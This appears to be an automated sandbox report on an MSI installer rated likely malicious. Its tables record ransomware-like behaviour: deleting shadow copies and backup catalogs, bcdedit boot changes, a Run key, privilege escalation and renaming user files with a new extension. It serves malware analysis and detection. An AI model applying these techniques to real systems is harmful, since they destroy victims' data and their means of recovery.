Analysis Overview
SHA256
d1d4e29f5fca0c97cd89a4b5134d298bf2829cea92e5d116084b83d980d2c6e0
Threat Level: Likely malicious
The file d1d4e29f5fca0c97cd89a4b5134d298.msi was found to be: Likely malicious.
Malicious Activity Summary
Modifies boot configuration data using bcdedit
Deletes shadow copies
Deletes System State backups
Blocklisted process makes network request
Modifies extensions of user files
Deletes backup catalog
Loads dropped DLL
Enumerates connected drives
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: MapViewOfSection
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Interacts with shadow copies
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-30 11:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-22 12:17
Reported
2022-03-22 12:22
Platform
win7-20220310-en
Max time kernel
4294196s
Max time network
199s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\MsiExec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f7888bf.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7888bf.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8E39.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7888c0.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\f7888c0.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8D2F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f7888c2.msi | C:\Windows\system32\msiexec.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\DrvInst.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 624 wrote to memory of 1324 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\MsiExec.exe |
| PID 624 wrote to memory of 1324 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\MsiExec.exe |
| PID 624 wrote to memory of 1324 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\MsiExec.exe |
| PID 624 wrote to memory of 1324 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\MsiExec.exe |
| PID 624 wrote to memory of 1324 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\MsiExec.exe |
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\d1d4e29f5fca0c97cd89a4b5134d298.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003DC" "000000000000059C"
C:\Windows\system32\MsiExec.exe
C:\Windows\system32\MsiExec.exe -Embedding 86D9C9812452565EF4BB7DCF21FE4ED4
Network
Files
memory/1924-54-0x000007FEFC2D1000-0x000007FEFC2D3000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
| MD5 | 6df3555b5c853c0359a62a8348bcec71 |
| SHA1 | 71b637ecd03faa3c32f97e24ece0b0233beffa0b |
| SHA256 | 97808538ef01c29dd1dcbfe89fb97036f42d66945b2748e572501ce1c8e3c0ed |
| SHA512 | 290a4c109751be6fb37c1c0fa217e6fbd06d362d3fb80df731ea75d2ee9f8129f8e605d4213662f44816a85f34a02efd47800d448ea5ec3e02acee3ebb1eb1f3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90a2634b0478d2503163439c2a7d5821 |
| SHA1 | b6f23afeeda4782099c96ac7ae2eb1f02f315eec |
| SHA256 | f73ec90ab9106d2792c68790d47760f6dc70cfaf46acc73ea9a3ea64ec0f64dd |
| SHA512 | 33142e1a6494a80edf0107f5b90096c416f068cd6ec7a245b5be0ae08a7041c24033b549fb6d0ec12ef9ef8f75135c6c89dee94997e35e3759c86bf5daca171d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
| MD5 | 78f2fcaa601f2fb4ebc937ba532e7549 |
| SHA1 | ddfb16cd4931c973a2037d3fc83a4d7d775d05e4 |
| SHA256 | 552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988 |
| SHA512 | bcad73a7a5afb7120549dd54ba1f15c551ae24c7181f008392065d1ed006e6fa4fa5a60538d52461b15a12f5292049e929cffde15cc400dec9cdfca0b36a68dd |
C:\Windows\Installer\MSI8D2F.tmp
| MD5 | 07944a97980bedc3b5864181bc59fc94 |
| SHA1 | a2bd9be4dd395eb7d2558f4de1fff1bbbb0ecd25 |
| SHA256 | 10f0b697db8d2f044954625f99eeafef1fb8c9acff0678171c2f9536f1d7a3ab |
| SHA512 | aeb62b32e82726df6cac9e79912d1cf9a2d83280b603e1a6a53ce39c66c66192d1d18256c29cd0041b6e1188796f6faab290a3fd708b85d5c2d6e45ec952a73a |
\Windows\Installer\MSI8D2F.tmp
| MD5 | 07944a97980bedc3b5864181bc59fc94 |
| SHA1 | a2bd9be4dd395eb7d2558f4de1fff1bbbb0ecd25 |
| SHA256 | 10f0b697db8d2f044954625f99eeafef1fb8c9acff0678171c2f9536f1d7a3ab |
| SHA512 | aeb62b32e82726df6cac9e79912d1cf9a2d83280b603e1a6a53ce39c66c66192d1d18256c29cd0041b6e1188796f6faab290a3fd708b85d5c2d6e45ec952a73a |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-22 12:17
Reported
2022-03-22 12:21
Platform
win10v2004-en-20220113
Max time kernel
193s
Max time network
205s
Command Line
Signatures
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\System32\bcdedit.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Deletes System State backups
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\wbadmin.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\NewEdit.raw => C:\Users\Admin\Pictures\NewEdit.raw.tjtwhzx | C:\Windows\System32\MsiExec.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UninstallRestart.raw => C:\Users\Admin\Pictures\UninstallRestart.raw.tjtwhzx | C:\Windows\System32\MsiExec.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SetPop.tiff | C:\Windows\System32\MsiExec.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SetPop.tiff => C:\Users\Admin\Pictures\SetPop.tiff.tjtwhzx | C:\Windows\System32\MsiExec.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\MsiExec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
